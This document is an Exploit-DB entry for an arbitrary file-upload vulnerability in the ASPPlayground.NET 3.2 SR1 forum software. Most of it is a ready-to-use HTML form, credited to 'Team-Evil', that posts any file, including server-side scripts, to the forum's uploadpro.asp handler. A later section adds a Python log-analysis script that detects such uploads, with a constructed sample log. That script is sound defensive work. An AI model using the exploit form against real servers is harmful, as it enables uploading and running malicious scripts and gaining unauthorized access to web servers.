ASPPlayGround.NET 3.2 SR1 - Arbitrary File Upload

EDB-ID: 25908
CVE: N/A
Author: Psycho
Type: webapps
Platform: ASP
Date: 2005-06-27

source: https://www.securityfocus.com/bid/14070/info

ASPPlayground.NET is prone to a remote arbitrary file-upload vulnerability.

Exploiting this issue may allow remote attackers to upload arbitrary files, including malicious scripts, and possibly execute the scripts on the affected server.

This issue can ultimately help attackers gain unauthorized access in the context of the webserver. 

http://www.example.com/forum/uploadpro.asp?memori=&deletefile=&mode=

refer to

http://www.example.com/forum/post.asp

*

ASP Playground html bug :
___________________________

<html>
<head>
<title>ASP Playground Version beta 3.2 SR1 upload Arbitrary Files</title>

</table>
<br>
<table width="98%" border="0" cellspacing="0" cellpadding="0">

<form method="POST" action="http://www.example.com/forum/uploadpro.asp?memori=&deletefile=&mode=" enctype="multipart/form-data" onSubmit="return respondToUploader(this)">
<tr>
<td bgcolor="8d5a18">
<table width="100%" border="0" cellspacing="1" cellpadding="4">
<tr>
<td bgcolor="f8fff3">
upload<br>
<input type="file" name="File1" size="22">
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td>
<hr size="1" noshade>
</td>
</tr>
<tr>
<td align="right">
<input type="submit" name="submit" value="upload">

</td>
</tr>
</form>

</table>
</body>
<center><b>pOWERED By Team-Evil l8oo8l@gmail.com
</html>
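
A log check a defender could run for the upload request shown above, as an added example that is not part of the original advisory. It flags POSTs to `uploadpro.asp` whose Referer is absent or not the forum's own host (what a copy of the form hosted elsewhere produces), and script files first requested by a client after it uploaded. The log lines, `SITE_HOST`, the extension list and the `/forum/upfiles/` path are constructed assumptions.

```python
from urllib.parse import urlparse

UPLOAD_STEM = "/forum/uploadpro.asp"             # handler named in the advisory
SCRIPT_EXTS = (".asp", ".asa", ".cer", ".aspx")  # assumption: extensions the server executes
SITE_HOST = "www.example.com"                    # assumption: the forum's own hostname

# Constructed IIS W3C log sample; IPs and the upfiles path are illustrative values.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(Referer)
2005-06-27 10:00:01 192.0.2.10 GET /forum/post.asp - 200 http://www.example.com/forum/default.asp
2005-06-27 10:00:09 192.0.2.10 POST /forum/uploadpro.asp memori=&deletefile=&mode= 200 http://www.example.com/forum/post.asp
2005-06-27 10:00:12 192.0.2.10 GET /forum/upfiles/1/photo.jpg - 200 http://www.example.com/forum/post.asp
2005-06-27 11:30:40 198.51.100.7 POST /forum/uploadpro.asp memori=&deletefile=&mode= 200 -
2005-06-27 11:30:55 198.51.100.7 GET /forum/upfiles/7/x.asp - 200 -
2005-06-27 11:31:10 203.0.113.5 GET /forum/default.asp - 200 -
"""

def parse_w3c(text):
    """Yield one dict per request, using the #Fields: header for column names."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def find_suspicious(text):
    """Return (rule, client_ip, uri_stem) findings in log order."""
    findings, seen_scripts, uploaders = [], set(), set()
    for r in parse_w3c(text):
        ip, stem = r["c-ip"], r["cs-uri-stem"].lower()
        if r["cs-method"] == "POST" and stem == UPLOAD_STEM:
            uploaders.add(ip)
            # An absent Referer ("-") parses to hostname None and is treated as off-site.
            ref_host = urlparse(r.get("cs(Referer)", "-")).hostname
            if ref_host != SITE_HOST:
                findings.append(("offsite-upload-form", ip, stem))
        elif stem.endswith(SCRIPT_EXTS):
            # A script path never requested before, fetched by a client that uploaded.
            if ip in uploaders and stem not in seen_scripts:
                findings.append(("new-script-after-upload", ip, stem))
            seen_scripts.add(stem)
    return findings

if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_LOG):
        print(finding)
```

On a real log the second rule needs enough history before the first upload for the application's own pages to be in the baseline; otherwise legitimate page views will be reported.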